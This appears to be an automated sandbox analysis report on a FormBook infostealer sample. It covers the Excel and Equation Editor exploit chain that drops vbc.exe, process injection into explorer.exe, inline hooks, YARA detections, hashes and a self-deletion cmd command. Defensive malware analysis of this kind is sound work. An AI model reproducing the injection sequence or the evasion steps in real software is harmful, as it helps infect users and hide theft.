                                          PeekMessageWINLINEexplorer.exe
                                          GetMessageWINLINEexplorer.exe
                                          GetMessageAINLINEexplorer.exe

                                          Processes

                                          Process: explorer.exe, Module: USER32.dll
                                          Function NameHook TypeNew Data
                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEB
                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEB
                                          GetMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEB
                                          GetMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEB

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Start time:14:03:15
                                          Start date:27/09/2021
                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                          Imagebase:0x13faf0000
                                          File size:28253536 bytes
                                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Start time:14:03:35
                                          Start date:27/09/2021
                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                          Imagebase:0x400000
                                          File size:543304 bytes
                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:14:03:41
                                          Start date:27/09/2021
                                          Path:C:\Users\Public\vbc.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\Public\vbc.exe'
                                          Imagebase:0x1000000
                                          File size:685568 bytes
                                          MD5 hash:50568FB6133EE4ED721EE46A3C0A9E98
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.466320044.00000000024B1000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.466515101.000000000251B000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Antivirus matches:
                                          • Detection: 13%, ReversingLabs
                                          Reputation:low

                                          General

                                          Start time:14:03:45
                                          Start date:27/09/2021
                                          Path:C:\Users\Public\vbc.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\Public\vbc.exe
                                          Imagebase:0x1000000
                                          File size:685568 bytes
                                          MD5 hash:50568FB6133EE4ED721EE46A3C0A9E98
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          General

                                          Start time:14:03:46
                                          Start date:27/09/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0xffa10000
                                          File size:3229696 bytes
                                          MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          General

                                          Start time:14:04:03
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\autofmt.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\SysWOW64\autofmt.exe
                                          Imagebase:0xab0000
                                          File size:658944 bytes
                                          MD5 hash:A475B7BB0CCCFD848AA26075E81D7888
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Start time:14:04:03
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\msiexec.exe
                                          Imagebase:0xa30000
                                          File size:73216 bytes
                                          MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:moderate

                                          General

                                          Start time:14:04:06
                                          Start date:27/09/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\Public\vbc.exe'
                                          Imagebase:0x4acb0000
                                          File size:302592 bytes
                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:17.4%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:20
                                            Total number of Limit Nodes:0

                                            Graph

                                            execution_graph 13125 fadb48 13126 fadbcf CreateProcessA 13125->13126 13128 fade2d 13126->13128 13129 fad548 13130 fad58c VirtualAllocEx 13129->13130 13132 fad60a 13130->13132 13133 fad148 13134 fad18c ResumeThread 13133->13134 13136 fad1de 13134->13136 13121 fad870 13122 fad8bc ReadProcessMemory 13121->13122 13124 fad93a 13122->13124 13137 fad6c0 13138 fad70c WriteProcessMemory 13137->13138 13140 fad7ab 13138->13140 13141 9b0240 13142 9b025a 13141->13142 13145 fad288 13142->13145 13146 fad2d1 Wow64SetThreadContext 13145->13146 13148 9b028c 13146->13148

                                            Executed Functions

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4{Pk$DtPk
                                            • API String ID: 0-907836734
                                            • Opcode ID: ccb20fe67f1baa0c6534d6cc1b99b033aea6e17f305d4d857bae98f4747494d0
                                            • Instruction ID: 0910d783d2c19e9295847b435524ef1836222068d09f163ef68da9b31a9ad20c
                                            • Opcode Fuzzy Hash: ccb20fe67f1baa0c6534d6cc1b99b033aea6e17f305d4d857bae98f4747494d0
                                            • Instruction Fuzzy Hash: 4DA3F974A00629CFCB14DF24C894E99B3B2FF89315F1182E9D909AB365DB35AE95CF40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4{Pk$DtPk
                                            • API String ID: 0-907836734
                                            • Opcode ID: b1c526840262a8db97742a7891c7f25604d2fd67b8f6d4726e03141a2bcf6f46
                                            • Instruction ID: c3e23bdfcaa1b4cdfd56c022833a8513ca415bf0b2c30ae5acf773e3b6e6705b
                                            • Opcode Fuzzy Hash: b1c526840262a8db97742a7891c7f25604d2fd67b8f6d4726e03141a2bcf6f46
                                            • Instruction Fuzzy Hash: 10A3E774A00628CFCB14DF24C894E99B3B2FF89315F1586E9D509AB361DB36AE95CF40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1608 425448-4258cb 1611 4258d2-425eac 1608->1611 1612 4258cd 1608->1612 1687 425ed6 1611->1687 1688 425eae-425eba 1611->1688 1612->1611 1691 425edc-42602c 1687->1691 1689 425ec4-425eca 1688->1689 1690 425ebc-425ec2 1688->1690 1692 425ed4 1689->1692 1690->1692 1705 426056 1691->1705 1706 42602e-42603a 1691->1706 1692->1691 1709 42605c-4261bb 1705->1709 1707 426044-42604a 1706->1707 1708 42603c-426042 1706->1708 1710 426054 1707->1710 1708->1710 1723 4261e5 1709->1723 1724 4261bd-4261c9 1709->1724 1710->1709 1727 4261eb-426689 1723->1727 1725 4261d3-4261d9 1724->1725 1726 4261cb-4261d1 1724->1726 1728 4261e3 1725->1728 1726->1728 1769 4266b3 1727->1769 1770 42668b-426697 1727->1770 1728->1727 1771 4266b9-426fb3 1769->1771 1772 4266a1-4266a7 1770->1772 1773 426699-42669f 1770->1773 1774 4266b1 1772->1774 1773->1774 1774->1771
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4{Pk$daPk
                                            • API String ID: 0-2361635739
                                            • Opcode ID: db5a5728717dda6ec29de656b6759422a14a787c8b708372c08fa8231f9c27e4
                                            • Instruction ID: f22f9eca04b8c215cf23821c710bb5b23cc91eded8706605adfffa13748665c5
                                            • Opcode Fuzzy Hash: db5a5728717dda6ec29de656b6759422a14a787c8b708372c08fa8231f9c27e4
                                            • Instruction Fuzzy Hash: 3DE2C234A002298FCB64DB24C894FEDB3B2BF89314F1585E9D509AB365DB35AE85CF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1856 427018-427021 1857 427063-427643 1856->1857 1858 427023-427053 1856->1858 1937 427645-427651 1857->1937 1938 42766d 1857->1938 1860 427055 1858->1860 1861 42705a-427062 1858->1861 1860->1861 1861->1857 1940 427653-427659 1937->1940 1941 42765b-427661 1937->1941 1939 427673-427699 1938->1939 1944 4276a1-4276b2 1939->1944 1942 42766b 1940->1942 1941->1942 1942->1939 1945 4276b9-4277c3 1944->1945 1955 4277c5-4277d1 1945->1955 1956 4277ed 1945->1956 1957 4277d3-4277d9 1955->1957 1958 4277db-4277e1 1955->1958 1959 4277f3-427819 1956->1959 1960 4277eb 1957->1960 1958->1960 1962 427821-427832 1959->1962 1960->1959 1963 427839-427952 1962->1963 1973 427954-427960 1963->1973 1974 42797c 1963->1974 1975 427962-427968 1973->1975 1976 42796a-427970 1973->1976 1977 427982-4279ae 1974->1977 1978 42797a 1975->1978 1976->1978 1980 4279b9-4279d0 1977->1980 1978->1977 1981 4279d7-427b65 1980->1981 1994 427b67-427b73 1981->1994 1995 427b8f 1981->1995 1996 427b75-427b7b 1994->1996 1997 427b7d-427b83 1994->1997 1998 427b95-427bc1 1995->1998 1999 427b8d 1996->1999 1997->1999 2001 427bcc-427be3 1998->2001 1999->1998 2002 427bea-428733 2001->2002
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4{Pk$z@
                                            • API String ID: 0-3906544164
                                            • Opcode ID: 1d3fb5342b684237d53804e4f38ff2e1ac4cb4f404364265c7f4c45eb0cb1c47
                                            • Instruction ID: dbd3b2475b5d3f7bdcd404b68dc4efe00c1def4e108f04caafc26e594810eb75
                                            • Opcode Fuzzy Hash: 1d3fb5342b684237d53804e4f38ff2e1ac4cb4f404364265c7f4c45eb0cb1c47
                                            • Instruction Fuzzy Hash: E8E2B134A00229CFCB24DB24C995FD9B3B2BF8A304F1585E9D509AB365DB35AE85CF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2104 425891-4258cb 2106 4258d2-425eac 2104->2106 2107 4258cd 2104->2107 2182 425ed6 2106->2182 2183 425eae-425eba 2106->2183 2107->2106 2186 425edc-425f02 2182->2186 2184 425ec4-425eca 2183->2184 2185 425ebc-425ec2 2183->2185 2187 425ed4 2184->2187 2185->2187 2189 425f0a-425f1b 2186->2189 2187->2186 2190 425f22-42602c 2189->2190 2200 426056 2190->2200 2201 42602e-42603a 2190->2201 2204 42605c-426082 2200->2204 2202 426044-42604a 2201->2202 2203 42603c-426042 2201->2203 2205 426054 2202->2205 2203->2205 2207 42608a-42609b 2204->2207 2205->2204 2208 4260a2-4261bb 2207->2208 2218 4261e5 2208->2218 2219 4261bd-4261c9 2208->2219 2222 4261eb-426217 2218->2222 2220 4261d3-4261d9 2219->2220 2221 4261cb-4261d1 2219->2221 2223 4261e3 2220->2223 2221->2223 2225 426222-426239 2222->2225 2223->2222 2226 426240-426689 2225->2226 2264 4266b3 2226->2264 2265 42668b-426697 2226->2265 2266 4266b9-426c48 2264->2266 2267 4266a1-4266a7 2265->2267 2268 426699-42669f 2265->2268 2317 426c4f-426c61 2266->2317 2269 4266b1 2267->2269 2268->2269 2269->2266 2318 426c68-426fb3 2317->2318
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4{Pk$daPk
                                            • API String ID: 0-2361635739
                                            • Opcode ID: 9e500ef6aa1f87900a6e1206f35a23c3cdd9d6f0c15ac82d95217b4a94995b36
                                            • Instruction ID: 9dcb7c436363106d518a4a9820044e142f029e13719be1e2ca64d9390b76bf44
                                            • Opcode Fuzzy Hash: 9e500ef6aa1f87900a6e1206f35a23c3cdd9d6f0c15ac82d95217b4a94995b36
                                            • Instruction Fuzzy Hash: F4E2B234A002298FCB64DB64C894FEDB3B2BF89304F1585E9D509AB365DB35AE85CF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2351 425508-427053 2354 427055 2351->2354 2355 42705a-427643 2351->2355 2354->2355 2432 427645-427651 2355->2432 2433 42766d 2355->2433 2435 427653-427659 2432->2435 2436 42765b-427661 2432->2436 2434 427673-4277c3 2433->2434 2450 4277c5-4277d1 2434->2450 2451 4277ed 2434->2451 2437 42766b 2435->2437 2436->2437 2437->2434 2452 4277d3-4277d9 2450->2452 2453 4277db-4277e1 2450->2453 2454 4277f3-427952 2451->2454 2455 4277eb 2452->2455 2453->2455 2468 427954-427960 2454->2468 2469 42797c 2454->2469 2455->2454 2470 427962-427968 2468->2470 2471 42796a-427970 2468->2471 2472 427982-427b65 2469->2472 2473 42797a 2470->2473 2471->2473 2489 427b67-427b73 2472->2489 2490 427b8f 2472->2490 2473->2472 2491 427b75-427b7b 2489->2491 2492 427b7d-427b83 2489->2492 2493 427b95-428733 2490->2493 2494 427b8d 2491->2494 2492->2494 2494->2493
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4{Pk
                                            • API String ID: 0-1718801119
                                            • Opcode ID: 00e064edd73899bd3c4f23f57452d49493e2d3dcaefc96f17fa960116b394f64
                                            • Instruction ID: 308a5987ab18eadf5ce48b0d5e62fe50be3413c82e8e3fdf601fe50fa807eebc
                                            • Opcode Fuzzy Hash: 00e064edd73899bd3c4f23f57452d49493e2d3dcaefc96f17fa960116b394f64
                                            • Instruction Fuzzy Hash: 97E2B134A00229CFCB24DB24C995FD9B3B2BF8A304F1585E9D509AB365DB35AE85CF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2727 4204e1-4204ed 2728 420507-420518 2727->2728 2729 4204ef-420503 2727->2729 2730 42051a 2728->2730 2731 42051f-42052a 2728->2731 2729->2728 2730->2731 2732 420534-42053a call 420150 2731->2732 2734 42053f-4205c2 2732->2734 2741 4205c8-4205f1 call 420160 2734->2741 2745 4205f7-420601 2741->2745 2746 420603 2745->2746 2747 420608-420681 2745->2747 2746->2747 2753 42068b-42068e 2747->2753 2754 420699-420913 2753->2754
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TNp
                                            • API String ID: 0-2666016086
                                            • Opcode ID: 79a92e934d286fc882a5b7904d53a48632237734757f5f5335eca922208296f1
                                            • Instruction ID: d7ed10f0f45273b64c9c1c238246c52531f5cf717389eae70224280289f0aea3
                                            • Opcode Fuzzy Hash: 79a92e934d286fc882a5b7904d53a48632237734757f5f5335eca922208296f1
                                            • Instruction Fuzzy Hash: 61D14B34E10219CFDB04DFB4C895AADB7B2FF89304F1185A9E509AB365EB70A985CF41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2779 420098-420518 2782 42051a 2779->2782 2783 42051f-420601 call 420150 call 420160 2779->2783 2782->2783 2798 420603 2783->2798 2799 420608-42068e 2783->2799 2798->2799 2806 420699-420913 2799->2806
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TNp
                                            • API String ID: 0-2666016086
                                            • Opcode ID: 65dfeb7f096c85e1199680a004c526ec34a99c7ab94fa360ecc560e5b1dba8e4
                                            • Instruction ID: a1a853b1e576539db95ae7fcd47dcc958a51f32f88a2ea0a7d9f2a25ef3e836e
                                            • Opcode Fuzzy Hash: 65dfeb7f096c85e1199680a004c526ec34a99c7ab94fa360ecc560e5b1dba8e4
                                            • Instruction Fuzzy Hash: 1BD13934E10219CFDB04DFB4C891AADB7B2FF89304F5185A9E509AB365EB70A985CF40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4a95a000b6c8897ae36da5b7c48d94c9be7c7d6ceab61b10fde89cdc0c07dffb
                                            • Instruction ID: 2699e49a06e3edcfe5e502e6d4e38fa1e9072a7a998806918019bcc3d90b2a63
                                            • Opcode Fuzzy Hash: 4a95a000b6c8897ae36da5b7c48d94c9be7c7d6ceab61b10fde89cdc0c07dffb
                                            • Instruction Fuzzy Hash: 4762D234A00229CFDB24DB74C895F99B7B2BF8A304F1185E9D5096B361DB35AE81CF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 959961ef840eb284b231d8dcd60eb2061aa26206ebc9d80047fe0038ea070f4d
                                            • Instruction ID: 6a77ba6b249f928adab2b4bbf6eda9e01b3428738ac6b8a87b662b35e9b42cae
                                            • Opcode Fuzzy Hash: 959961ef840eb284b231d8dcd60eb2061aa26206ebc9d80047fe0038ea070f4d
                                            • Instruction Fuzzy Hash: 1062E134A10229CFDB24DB74C895F99B3B2BF8A304F1185E9E5096B361DB35AE81CF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 62a3609d040545577e3d90d5a910f8b046de3c3e45b3ed978cc47924e1468ca0
                                            • Instruction ID: ba0b1d1a5097bd7d9249ee599d5839946d1a05a665701c08b421aa2da78a9484
                                            • Opcode Fuzzy Hash: 62a3609d040545577e3d90d5a910f8b046de3c3e45b3ed978cc47924e1468ca0
                                            • Instruction Fuzzy Hash: 10A1E670E05228CFEF10CFA9D9447AEBBB1FF49300F6090AAD409A7251D7785A86DF59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 092b52cb80fe7b72e660a7ccde9e9991690856608de0fbf46a76ce44bf4f57d5
                                            • Instruction ID: 0486b2d5c6049e4cfcd4887d1d1f1219dd8f430eb811537c189b0ed49223f4bd
                                            • Opcode Fuzzy Hash: 092b52cb80fe7b72e660a7ccde9e9991690856608de0fbf46a76ce44bf4f57d5
                                            • Instruction Fuzzy Hash: 0A91E5B4E042298BCF10CFA9D5446AEFBF2FF89300F64842AD415A7341D7749985CF95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f47880a3388e53699eb937839117076fbb6ad7e3cde472ac96ebd80600b1d513
                                            • Instruction ID: f133917210d545c2ec27d91bf1bfed73015777a2842cbc90f1a960bad4dd3e2e
                                            • Opcode Fuzzy Hash: f47880a3388e53699eb937839117076fbb6ad7e3cde472ac96ebd80600b1d513
                                            • Instruction Fuzzy Hash: 0D81D570E05228CFEF10CFA9D9447AEBBF1FB49300F6090AAD409A7251D7785A86DF59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2599 42ae28-42ae49 2600 42ae50-42ae9c 2599->2600 2601 42ae4b 2599->2601 2607 42aea5-42aeac 2600->2607 2601->2600 2608 42aeae-42aeb7 2607->2608 2609 42aecd 2607->2609 2611 42aeb9-42aebc 2608->2611 2612 42aebe-42aec1 2608->2612 2610 42aed0-42aedc 2609->2610 2613 42aecb 2611->2613 2612->2613 2613->2610
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.464584322.0000000000420000.00000040.00000001.sdmp, Offset: 00420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_420000_vbc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PSp$PSp
                                            • API String ID: 0-3241751829
                                            • Opcode ID: 7530ba474812ee50c83560c7390010456b1c3d018bb0ff39ad4fd7759883129f
                                            • Instruction ID: c752a5495870f9fc30410fa8400236585ed715120ab58784c872b4526b0c6bff
                                            • Opcode Fuzzy Hash: 7530ba474812ee50c83560c7390010456b1c3d018bb0ff39ad4fd7759883129f
                                            • Instruction Fuzzy Hash: 18210774E04219DFCF04DFA9D8446EEBBB1BB49300F61842AD815B3310E7385A42DF96
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
